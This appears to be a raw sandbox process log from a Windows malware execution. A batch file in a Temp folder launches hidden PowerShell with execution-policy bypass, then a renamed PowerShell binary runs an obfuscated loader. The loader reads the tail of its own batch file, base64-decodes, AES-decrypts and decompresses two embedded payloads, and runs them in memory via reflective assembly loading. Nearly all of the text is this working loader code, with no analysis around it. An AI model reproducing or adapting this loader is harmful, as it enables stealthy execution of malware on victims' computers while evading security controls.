cmd.exe "C:\Windows\System32\cmd.exe" /c start /wait "LMwqEbeQv" C:\Users\test22\AppData\Local\Temp\save.bat
3040powershell.exe powershell -noprofile -w hidden -ep bypass -c #
2272save.bat.exe "C:\Users\test22\AppData\Local\Temp\save.bat.exe" -noprofile -ep bypass -c function yR($v){$v.Replace('@', '')}$Kh=yR 'Fro@mBa@se64@St@ri@ng@';$IZ=yR 'Spl@it@';$oS=yR 'R@e@a@dAll@Te@x@t@';$hn=yR 'Entr@yPo@int@';$bU=yR 'Ch@an@g@eEx@ten@s@io@n@';$qi=yR 'I@nv@ok@e@';$qJ=yR 'Get@Cu@r@r@e@ntP@ro@ces@s@';$Xu=yR 'Tra@ns@form@Fi@nal@Bloc@k@';$BY=yR 'C@r@ea@te@D@ecr@ypt@o@r@';$nX=yR 'Loa@d@';function nAwju($EukzE,$KnLgV,$DHvkN){$mNRTM=[System.Security.Cryptography.Aes]::Create();$mNRTM.Mode=[System.Security.Cryptography.CipherMode]::CBC;$mNRTM.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$mNRTM.Key=[System.Convert]::$Kh($KnLgV);$mNRTM.IV=[System.Convert]::$Kh($DHvkN);$XIotA=$mNRTM.$BY();$HuHEw=$XIotA.$Xu($EukzE,0,$EukzE.Length);$XIotA.Dispose();$mNRTM.Dispose();$HuHEw;}function GmSLK($EukzE){$ttBgS=New-Object System.IO.MemoryStream(,$EukzE);$bHGBk=New-Object System.IO.MemoryStream;$IttUw=New-Object System.IO.Compression.GZipStream($ttBgS,[IO.Compression.CompressionMode]::Decompress);$IttUw.CopyTo($bHGBk);$IttUw.Dispose();$ttBgS.Dispose();$bHGBk.Dispose();$bHGBk.ToArray();}function Gvvpt($EukzE,$KnLgV){[System.Reflection.Assembly]::$nX([byte[]]$EukzE).$hn.$qi($null,$KnLgV);}$cBaPI=[System.IO.File]::$oS([System.IO.Path]::$bU([System.Diagnostics.Process]::$qJ().MainModule.FileName, $null)).$IZ([Environment]::NewLine);$erUjZ=$cBaPI[$cBaPI.Length-1].Substring(2);$CYaoK=[string[]]$erUjZ.$IZ('\');$aOqoR=GmSLK (nAwju ([Convert]::$Kh($CYaoK[0])) $CYaoK[2] $CYaoK[3]);$YQHYd=GmSLK (nAwju ([Convert]::$Kh($CYaoK[1])) $CYaoK[2] $CYaoK[3]);Gvvpt $YQHYd $null;Gvvpt $aOqoR $null;
2396